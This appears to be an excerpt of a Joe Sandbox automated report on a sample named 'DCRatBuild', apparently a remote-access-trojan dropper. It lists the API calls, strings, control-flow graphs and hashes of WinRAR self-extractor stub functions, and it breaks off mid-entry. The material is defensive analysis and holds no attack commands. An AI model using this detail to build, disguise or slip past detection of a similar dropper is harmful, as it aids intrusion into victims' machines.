                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjx
                                        • API String ID: 788466649-1079212837
                                        • Opcode ID: 517ec9774a549bb474eb6384f1bba7fd478944a913783681eabe2c4c4ca7e1d8
                                        • Instruction ID: 53c3562cf8a3374f514a2d64ee677cf286f03c8a2811a8dc6c367d489705a88f
                                        • Opcode Fuzzy Hash: 517ec9774a549bb474eb6384f1bba7fd478944a913783681eabe2c4c4ca7e1d8
                                        • Instruction Fuzzy Hash: D861C6B1940345FFD320AF65DC4DF2A37ACAB45785F048429F58A92192EBBCCD44C7AA
                                        Function 00749E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 770 749e1c-749e38 FindResourceW 771 749e3e-749e50 SizeofResource 770->771 772 749f2f-749f32 770->772 773 749e70-749e72 771->773 774 749e52-749e61 LoadResource 771->774 776 749f2e 773->776 774->773 775 749e63-749e6e LockResource 774->775 775->773 777 749e77-749e8c GlobalAlloc 775->777 776->772 778 749e92-749e9b GlobalLock 777->778 779 749f28-749f2d 777->779 780 749f21-749f22 GlobalFree 778->780 781 749ea1-749ebf call 74f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 749ec1-749ee3 call 749d7b 781->784 785 749f1a-749f1b GlobalUnlock 781->785 784->785 790 749ee5-749eed 784->790 785->780 791 749eef-749f03 GdipCreateHBITMAPFromBitmap 790->791 792 749f08-749f16 790->792 791->792 793 749f05 791->793 792->785 793->792
                                        APIs
                                        • FindResourceW.KERNEL32(0074AE4D,PNG,?,?,?,0074AE4D,00000066), ref: 00749E2E
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0074AE4D,00000066), ref: 00749E46
                                        • LoadResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E59
                                        • LockResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E64
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0074AE4D,00000066), ref: 00749E82
                                        • GlobalLock.KERNEL32(00000000), ref: 00749E93
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00749EB7
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00749EFC
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00749F1B
                                        • GlobalFree.KERNEL32(00000000), ref: 00749F22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                        • String ID: PNG
                                        • API String ID: 3656887471-364855578
                                        • Opcode ID: b97c7f3822b52bc7af26c50c1761e1b85ab3b8a4defb6559d0569bdcace25e7a
                                        • Instruction ID: cce39074dda704cef03873baff82a2e39bc9f581b699a19d4b00bd9f85a05571
                                        • Opcode Fuzzy Hash: b97c7f3822b52bc7af26c50c1761e1b85ab3b8a4defb6559d0569bdcace25e7a
                                        • Instruction Fuzzy Hash: AB31C271604706EFC7109F61DC48D2BBBADFF86751B048528FA06D2260DBBADC04CAA4
                                        Function 0073A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 970 73a5f4-73a61f call 74e360 973 73a691-73a69a FindNextFileW 970->973 974 73a621-73a632 FindFirstFileW 970->974 975 73a6b0-73a6b2 973->975 976 73a69c-73a6aa GetLastError 973->976 977 73a6b8-73a75c call 73fe56 call 73bcfb call 740e19 * 3 974->977 978 73a638-73a64f call 73b66c 974->978 975->977 979 73a761-73a774 975->979 976->975 977->979 984 73a651-73a668 FindFirstFileW 978->984 985 73a66a-73a673 GetLastError 978->985 984->977 984->985 987 73a675-73a678 985->987 988 73a684 985->988 987->988 991 73a67a-73a67d 987->991 992 73a686-73a68c 988->992 991->988 994 73a67f-73a682 991->994 992->979 994->992
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A628
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A65E
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A66A
                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A692
                                        • GetLastError.KERNEL32(?,?,?,?,0073A4EF,000000FF,?,?), ref: 0073A69E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next
                                        • String ID:
                                        • API String ID: 869497890-0
                                        • Opcode ID: 45866734ec418b247581aa169de5d775ebf1a0a65eae72ff3f441b73e7cbc47b
                                        • Instruction ID: 5abe8d7f214833f22cb80c97baa2d97bc5754ffab0da9e5610f16482279a0dfe
                                        • Opcode Fuzzy Hash: 45866734ec418b247581aa169de5d775ebf1a0a65eae72ff3f441b73e7cbc47b
                                        • Instruction Fuzzy Hash: 4C418372604341EFD320EF68C885ADAF7E8BF49340F044A29F6D9D3211D778A958CB92
                                        Function 0075753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002,00000000), ref: 0075755E
                                        • TerminateProcess.KERNEL32(00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002,00000000), ref: 00757565
                                        • ExitProcess.KERNEL32 ref: 00757577
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: dfcf521eb8c8fb310ac0a276facff00e7e15120d5c4c6ade39590a96dc01c138
                                        • Instruction ID: 850f221d3be6b95a1187e4fa96671066fe87c3893f3bde26b735bb85692afe9a
                                        • Opcode Fuzzy Hash: dfcf521eb8c8fb310ac0a276facff00e7e15120d5c4c6ade39590a96dc01c138
                                        • Instruction Fuzzy Hash: FCE0BF31404648EBCF15AF54DD0DA893B6AEB41742F10C414FD064B122DBBDDE56CA54
                                        Function 0073857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog_memcmp
                                        • String ID:
                                        • API String ID: 3004599000-0
                                        • Opcode ID: 86b05d72ae292987c799208af3b7f4c17670b6273c412e082b96b9dc1eb86bf1
                                        • Instruction ID: d29b84118f870a9bde2a34f3fabb479aafa95b4ca17fd95463948aea888e1048
                                        • Opcode Fuzzy Hash: 86b05d72ae292987c799208af3b7f4c17670b6273c412e082b96b9dc1eb86bf1
                                        • Instruction Fuzzy Hash: 91822971904346EEFF25DB64C885BFABBB9AF05300F0840B9F9499B143DB795A48CB61
                                        Function 0074AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074AEE5
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prologItemTextWindow
                                        • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                        • API String ID: 810644672-8108337
                                        • Opcode ID: b4f1f11e9b657d42719d5ae9497b4171f06ebe01290cf7d61e70a74b879bcb0b
                                        • Instruction ID: 982498a917a9b95938718494927c3371305b57080ff33d1cf191fc8c54819670
                                        • Opcode Fuzzy Hash: b4f1f11e9b657d42719d5ae9497b4171f06ebe01290cf7d61e70a74b879bcb0b
                                        • Instruction Fuzzy Hash: D342D6B1A84244BEEB21AFA4DC4EFBE777CAB01744F008155F605A60D2DBBC8D45CB66
                                        Function 007400CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 257 7400cf-7400ee call 74e360 GetModuleHandleW 260 740154-7403b2 257->260 261 7400f0-740107 GetProcAddress 257->261 264 740484-7404b3 GetModuleFileNameW call 73bc85 call 73fe56 260->264 265 7403b8-7403c3 call 7570dd 260->265 262 740121-740131 GetProcAddress 261->262 263 740109-74011f 261->263 262->260 266 740133-740152 262->266 263->262 280 7404b5-7404bf call 73acf5 264->280 265->264 274 7403c9-7403fa GetModuleFileNameW CreateFileW 265->274 266->260 275 7403fc-74040a SetFilePointer 274->275 276 740478-74047f CloseHandle 274->276 275->276 278 74040c-740429 ReadFile 275->278 276->264 278->276 282 74042b-740450 278->282 285 7404c1-7404c5 call 740085 280->285 286 7404cc 280->286 284 74046d-740476 call 73fbd8 282->284 284->276 294 740452-74046c call 740085 284->294 291 7404ca 285->291 289 7404ce-7404d0 286->289 292 7404f2-740518 call 73bcfb GetFileAttributesW 289->292 293 7404d2-7404f0 CompareStringW 289->293 291->289 296 74051a-74051e 292->296 301 740522 292->301 293->292 293->296 294->284 296->280 300 740520 296->300 302 740526-740528 300->302 301->302 303 740560-740562 302->303 304 74052a 302->304 306 74066f-740679 303->306 307 740568-74057f call 73bccf call 73acf5 303->307 305 74052c-740552 call 73bcfb GetFileAttributesW 304->305 312 740554-740558 305->312 313 74055c 305->313 317 7405e7-74061a call 73400a AllocConsole 307->317 318 740581-7405e2 call 740085 * 2 call 73ddd1 call 73400a call 73ddd1 call 749f35 307->318 312->305 315 74055a 312->315 313->303 315->303 323 740667-740669 ExitProcess 317->323 324 74061c-740661 GetCurrentProcessId AttachConsole call 7535b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 007400E4
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007400F6
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00740127
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007403D4
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007403F0
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00740402
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00763BA4,00000000), ref: 00740421
                                        • CloseHandle.KERNEL32(00000000), ref: 00740479
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0074048F
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007404E7
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00740510
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0074054A
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • _swprintf.LIBCMT ref: 007405BE
                                        • _swprintf.LIBCMT ref: 0074060A
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • AllocConsole.KERNEL32 ref: 00740612
                                        • GetCurrentProcessId.KERNEL32 ref: 0074061C
                                        • AttachConsole.KERNEL32(00000000), ref: 00740623
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00740649
                                        • WriteConsoleW.KERNEL32(00000000), ref: 00740650
                                        • Sleep.KERNEL32(00002710), ref: 0074065B
                                        • FreeConsole.KERNEL32 ref: 00740661
                                        • ExitProcess.KERNEL32 ref: 00740669
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                        • String ID: <v$ ?v$(>v$(@v$0Av$4=v$8<v$<?v$@>v$@@v$D=v$DAv$DXGIDebug.dll$P<v$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;v$T?v$X>v$X@v$\Av$`=v$dwmapi.dll$kernel32$l<v$p>v$p?v$p@v$uxtheme.dll$x=v$|<v$>v$?v
                                        • API String ID: 1201351596-2610461605
                                        • Opcode ID: 6258c024e13521660677933e76301fe7eee1c880495f01cc971cf9afadc9c908
                                        • Instruction ID: c4a280c5cc85e9a064f3e9ba4321f8eefceb215d5f4b434207aaf25175f6c833
                                        • Opcode Fuzzy Hash: 6258c024e13521660677933e76301fe7eee1c880495f01cc971cf9afadc9c908
                                        • Instruction Fuzzy Hash: 25D164B1508384ABD7319F50D849B9FB7E8FB85704F00492DFA8A96151DBBC8648CFA6
                                        Function 0074BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 406 74bdf5-74be0d call 74e28c call 74e360 411 74ca90-74ca9d 406->411 412 74be13-74be3d call 74aa36 406->412 412->411 415 74be43-74be48 412->415 416 74be49-74be57 415->416 417 74be58-74be6d call 74a6c7 416->417 420 74be6f 417->420 421 74be71-74be86 call 7417ac 420->421 424 74be93-74be96 421->424 425 74be88-74be8c 421->425 427 74ca5c-74ca87 call 74aa36 424->427 428 74be9c 424->428 425->421 426 74be8e 425->426 426->427 427->416 439 74ca8d-74ca8f 427->439 430 74c074-74c076 428->430 431 74c115-74c117 428->431 432 74c132-74c134 428->432 433 74bea3-74bea6 428->433 430->427 437 74c07c-74c088 430->437 431->427 434 74c11d-74c12d SetWindowTextW 431->434 432->427 436 74c13a-74c141 432->436 433->427 438 74beac-74bf06 call 749da4 call 73b965 call 73a49d call 73a5d7 call 7370bf 433->438 434->427 436->427 440 74c147-74c160 436->440 441 74c09c-74c0a1 437->441 442 74c08a-74c09b call 757168 437->442 495 74c045-74c05a call 73a52a 438->495 439->411 446 74c162 440->446 447 74c168-74c176 call 7535b3 440->447 444 74c0a3-74c0a9 441->444 445 74c0ab-74c0b6 call 74ab9a 441->445 442->441 451 74c0bb-74c0bd 444->451 445->451 446->447 447->427 460 74c17c-74c185 447->460 457 74c0bf-74c0c6 call 7535b3 451->457 458 74c0c8-74c0e8 call 7535b3 call 7535de 451->458 457->458 483 74c101-74c103 458->483 484 74c0ea-74c0f1 458->484 464 74c187-74c18b 460->464 465 74c1ae-74c1b1 460->465 464->465 469 74c18d-74c195 464->469 471 74c296-74c2a4 call 73fe56 465->471 472 74c1b7-74c1ba 465->472 469->427 475 74c19b-74c1a9 call 73fe56 469->475 485 74c2a6-74c2ba call 7517cb 471->485 477 74c1c7-74c1e2 472->477 478 74c1bc-74c1c1 472->478 475->485 496 74c1e4-74c21e 477->496 497 74c22c-74c233 477->497 478->471 478->477 483->427 486 74c109-74c110 call 7535ce 483->486 490 74c0f3-74c0f5 484->490 491 74c0f8-74c100 call 757168 484->491 505 74c2c7-74c318 call 73fe56 call 74a8d0 GetDlgItem SetWindowTextW SendMessageW call 7535e9 485->505 506 74c2bc-74c2c0 485->506 486->427 490->491 491->483 512 74c060-74c06f call 73a4b3 495->512 513 74bf0b-74bf1f SetFileAttributesW 495->513 523 74c220 496->523 524 74c222-74c224 496->524 499 74c235-74c24d call 7535b3 497->499 500 74c261-74c284 call 7535b3 * 2 497->500 499->500 517 74c24f-74c25c call 73fe2e 499->517 500->485 534 74c286-74c294 call 73fe2e 500->534 542 74c31d-74c321 505->542 506->505 511 74c2c2-74c2c4 506->511 511->505 512->427 519 74bfc5-74bfd5 GetFileAttributesW 513->519 520 74bf25-74bf58 call 73b4f7 call 73b207 call 7535b3 513->520 517->500 519->495 529 74bfd7-74bfe6 DeleteFileW 519->529 549 74bf5a-74bf69 call 7535b3 520->549 550 74bf6b-74bf79 call 73b925 520->550 523->524 524->497 529->495 533 74bfe8-74bfeb 529->533 537 74bfef-74c01b call 73400a GetFileAttributesW 533->537 534->485 546 74bfed-74bfee 537->546 547 74c01d-74c033 MoveFileW 537->547 542->427 543 74c327-74c33b SendMessageW 542->543 543->427 546->537 547->495 551 74c035-74c03f MoveFileExW 547->551 549->550 556 74bf7f-74bfbe call 7535b3 call 74f350 549->556 550->512 550->556 551->495 556->519
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074BDFA
                                          • Part of subcall function 0074AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0074AAFE
                                        • SetWindowTextW.USER32(?,?), ref: 0074C127
                                        • _wcsrchr.LIBVCRUNTIME ref: 0074C2B1
                                        • GetDlgItem.USER32(?,00000066), ref: 0074C2EC
                                        • SetWindowTextW.USER32(00000000,?), ref: 0074C2FC
                                        • SendMessageW.USER32(00000000,00000143,00000000,0077A472), ref: 0074C30A
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0074C335
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 3564274579-312220925
                                        • Opcode ID: ec21cc87a1285f999ae0e90aefc4385b2d0d4c68b96ebf1ea414e0e8349da879
                                        • Instruction ID: b794782627b58911b9a63382639116b431c8b87f00a63a00f82347bdac7ed9e0
                                        • Opcode Fuzzy Hash: ec21cc87a1285f999ae0e90aefc4385b2d0d4c68b96ebf1ea414e0e8349da879
                                        • Instruction Fuzzy Hash: 34E16472D00118EADB26DBA4DC49DEF77BCAF09351F1040A6FA09E3051EB789E88CB54
                                        Function 0073D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 561 73d341-73d378 call 74e28c call 74e360 call 7515e8 568 73d3ab-73d3b4 call 73fe56 561->568 569 73d37a-73d3a9 GetModuleFileNameW call 73bc85 call 73fe2e 561->569 572 73d3b9-73d3dd call 739619 call 7399b0 568->572 569->572 580 73d3e3-73d3eb 572->580 581 73d7a0-73d7a6 call 739653 572->581 583 73d409-73d438 call 755a90 * 2 580->583 584 73d3ed-73d405 call 743781 * 2 580->584 585 73d7ab-73d7bb 581->585 594 73d43b-73d43e 583->594 595 73d407 584->595 596 73d444-73d44a call 739e40 594->596 597 73d56c-73d58f call 739d30 call 7535d3 594->597 595->583 601 73d44f-73d476 call 739bf0 596->601 597->581 606 73d595-73d5b0 call 739bf0 597->606 607 73d535-73d538 601->607 608 73d47c-73d484 601->608 622 73d5b2-73d5b7 606->622 623 73d5b9-73d5cc call 7535d3 606->623 612 73d53b-73d55d call 739d30 607->612 610 73d486-73d48e 608->610 611 73d4af-73d4ba 608->611 610->611 614 73d490-73d4aa call 755ec0 610->614 615 73d4e5-73d4ed 611->615 616 73d4bc-73d4c8 611->616 612->594 626 73d563-73d566 612->626 637 73d52b-73d533 614->637 638 73d4ac 614->638 620 73d519-73d51d 615->620 621 73d4ef-73d4f7 615->621 616->615 618 73d4ca-73d4cf 616->618 618->615 625 73d4d1-73d4e3 call 755808 618->625 620->607 628 73d51f-73d522 620->628 621->620 627 73d4f9-73d513 call 755ec0 621->627 629 73d5f1-73d5f8 622->629 623->581 642 73d5d2-73d5ee call 74137a call 7535ce 623->642 625->615 643 73d527 625->643 626->581 626->597 627->581 627->620 628->608 633 73d5fa 629->633 634 73d5fc-73d625 call 73fdfb call 7535d3 629->634 633->634 651 73d633-73d649 634->651 652 73d627-73d62e call 7535ce 634->652 637->612 638->611 642->629 643->637 654 73d731-73d757 call 73ce72 call 7535ce * 2 651->654 655 73d64f-73d65d 651->655 652->581 692 73d771-73d79d call 755a90 * 2 654->692 693 73d759-73d76f call 743781 * 2 654->693 658 73d664-73d669 655->658 659 73d66f-73d678 658->659 660 73d97c-73d984 658->660 662 73d684-73d68b 659->662 663 73d67a-73d67e 659->663 664 73d72b-73d72e 660->664 665 73d98a-73d98e 660->665 667 73d691-73d6b6 662->667 668 73d880-73d891 call 73fcbf 662->668 663->660 663->662 664->654 669 73d990-73d996 665->669 670 73d9de-73d9e4 665->670 674 73d6b9-73d6de call 7535b3 call 755808 667->674 694 73d897-73d8c0 call 73fe56 call 755885 668->694 695 73d976-73d979 668->695 675 73d722-73d725 669->675 676 73d99c-73d9a3 669->676 672 73d9e6-73d9ec 670->672 673 73da0a-73da2a call 73ce72 670->673 672->673 679 73d9ee-73d9f4 672->679 697 73da02-73da05 673->697 711 73d6e0-73d6ea 674->711 712 73d6f6 674->712 675->658 675->664 682 73d9a5-73d9a8 676->682 683 73d9ca 676->683 679->675 687 73d9fa-73da01 679->687 690 73d9c6-73d9c8 682->690 691 73d9aa-73d9ad 682->691 686 73d9cc-73d9d9 683->686 686->675 687->697 690->686 699 73d9c2-73d9c4 691->699 700 73d9af-73d9b2 691->700 692->581 693->692 694->695 720 73d8c6-73d93c call 741596 call 73fdfb call 73fdd4 call 73fdfb call 7558d9 694->720 695->660 699->686 705 73d9b4-73d9b8 700->705 706 73d9be-73d9c0 700->706 705->679 713 73d9ba-73d9bc 705->713 706->686 711->712 717 73d6ec-73d6f4 711->717 718 73d6f9-73d6fd 712->718 713->686 717->718 718->674 721 73d6ff-73d706 718->721 754 73d94a-73d95f 720->754 755 73d93e-73d947 720->755 723 73d7be-73d7c1 721->723 724 73d70c-73d71a call 73fdfb 721->724 723->668 726 73d7c7-73d7ce 723->726 728 73d71f 724->728 730 73d7d0-73d7d4 726->730 731 73d7d6-73d7d7 726->731 728->675 730->731 733 73d7d9-73d7e7 730->733 731->726 735 73d7e9-73d7ec 733->735 736 73d808-73d830 call 741596 733->736 739 73d805 735->739 740 73d7ee-73d803 735->740 743 73d853-73d85b 736->743 744 73d832-73d84e call 7535e9 736->744 739->736 740->735 740->739 747 73d862-73d87b call 73dd6b 743->747 748 73d85d 743->748 744->728 747->728 748->747 756 73d960-73d967 754->756 755->754 757 73d973-73d974 756->757 758 73d969-73d96d 756->758 757->756 758->728 758->757
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0073D346
                                        • _wcschr.LIBVCRUNTIME ref: 0073D367
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0073D328,?), ref: 0073D382
                                        • __fprintf_l.LIBCMT ref: 0073D873
                                          • Part of subcall function 0074137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0073B652,00000000,?,?,?,00050160), ref: 00741396
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
